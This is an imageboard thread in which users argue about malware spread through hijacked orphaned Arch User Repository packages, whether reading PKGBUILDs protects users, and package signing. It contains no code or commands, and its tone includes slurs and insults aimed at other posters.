37 KB PNG

>>109041163
>install rocky linux instead
>first thing I see on their website is a trans/poc pride flag logo

>>109062310
You can just as easily inject a syringe of cyanide into bison steaks as you can poison pills into Tylenol. But nobody has ever done the first one because more people take Tylenol than eat bison steaks.

>>109040408
>Heh guise, it's fine, I definitely totally check every single pkgbuild I run as well as every single source file it downloads and I decompile every single binary downloaded, decompile it and check for any malware behavior!

This is what Arch users actually claim. (They don't actually, which is why they're fucked. What they really do is install something like yay which just YOLOs AURshit).

>>109062519
Literally, nobody has ever claimed that.

>>109062525
They claim that kind of shit every time. Even in this thread you see Arch-retards who claim that all you need to do is read the PKGBUILD.

>>109062535
They don't, but okay.

>>109062539
>CTRL+F (in this thread)
>Type "PKGBUILD"
>It takes you to various posts of Arch-tards claiming that "you just need to read the PKGBUILD, bro!"

>>109062535
I'm glad we agree that they don't say that they've checked the package builds and they only say that that's what you should be doing. No idea why you lied in your first post and then clearly admitted that you were in your second post.

>>109062554
See
>>109062560
The discussion is over. Next time, don't make ridiculously false claims that you end up having to move the goal post of

>>109062560
If someone acts smug and claims that "you just need to check the PKGBUILD, bro", this implies they do it themselves.
Why would someone claim "Reading a PKGBUILD isn't strenuous" if they don't do it?

Merely reading the PKGBUILD doesn't do shit if the malware is in the source code or binaries it downloads anyway so "just reading the PKGBUILD" isn't enough, anyway. If you want to be safe, you can't use the AUR at all.

>>109062578
Yeah, like I said, the discussion is over. You can keep replying, but every reply you make to backtrack from your original claim just makes you look worse. In either case, I'm going to hide your posts and replies now, since you're obviously just going to keep responding with bad faith nonsense arguments. And I don't have time to waste on you.

File: DOTHIS-0.png (517 KB, 981x700)

517 KB PNG

All of this fagging on about "checking muh PKGBUILD" but it's not like most users are going to be able to pick up on suspicious code. Nobody putting in backdoors is going
># this section sends the users bank account information directly to my phone
># if you want malware free software delete everything below this

I have a fair grasp of python and bash and even I don't think I'd be able to detect malicious shit every single time. With some attention to detail and a bit of luck sure, but then who the fuck puts that much effort into every .exe they download?

Why can't it just be accepted that if you're downloading untrusted software (read: 95%+ of all software ever made) that you should be maintaining other positive security practices. If you're at the point where you're using Arch+derivatives you should be be able to segment your network, harden your install against basic linux flaws, and have backups ready for when shit goes south. Such straightforward issues being blown out of proportion... baka.

>>109062584
What claim have I backtracked from?
I still believe most Arch users don't check their PKGBUILD. I still believe checking the PKGBUILD is not enough even if you do because the source code or the binary it downloads might be the malware. I still believe that Arch users who claim they verify these things for every single AUR package they use are lying.
And obviously nobody actually decompiles binaries, that part was an exaggeration to show you absurd those Arch users' claims were.

But sure. Have a nice day.

>>109062578
just scrolling the main page
they were orphan packages has nothing to do with the source of the original package
they modified the pkgbuild (about 20-50 lines, very short file) to use npm to install malware in the npm package manager.
npm and pip are the real malware distribution platforms.

>>109062702
Pretty crude attack, then. If the attacker had been smart, they could have gotten more people.
Doesn't speak for the average Arch user that an attack like this has been this successful.

>B-But I typed commands from the installation tutorial on the wiki! I'm a computer wizard!

File: 524198321.gif (2.03 MB, 498x640)

2.03 MB GIF

oh no, how will Arch users post pictures their desktop now?

>>109062742
it only ever happened in the first place because any rando can just claim any orphaned package without any restrictions or questions asked
really surprising that it took this long to happen

B-B-BUT MY HECKIN MARKETSHARE ? :(((

>>109062770
Screenfetch. Or was it Neofetch nowadays? Or pfetch? I really don't know what the current screenfetch clone of the week is called. Only Arch users have enough free time to keep up with this kind of shit.

File: 1765805374768199.jpg (146 KB, 679x765)

146 KB JPG

>>109040408
Feels good being a Qubeschad.

File: 1753518641412222.gif (25 KB, 450x556)

25 KB GIF

>>109061401
What's the salary over there in south asia? Up to $20 USD a day yet?

>>109054114
1. Verifying the origin doesn't make any difference if the origin is serving malware
2. As other anon said, TLS and certificates accomplish the same thing.
3. You have to trust that you are using authentic keys.
4. You have to trust that the software you're using to perform key validation is doing it correctly/not compromised.

>>109040408
>AUR
i so don't give a shit.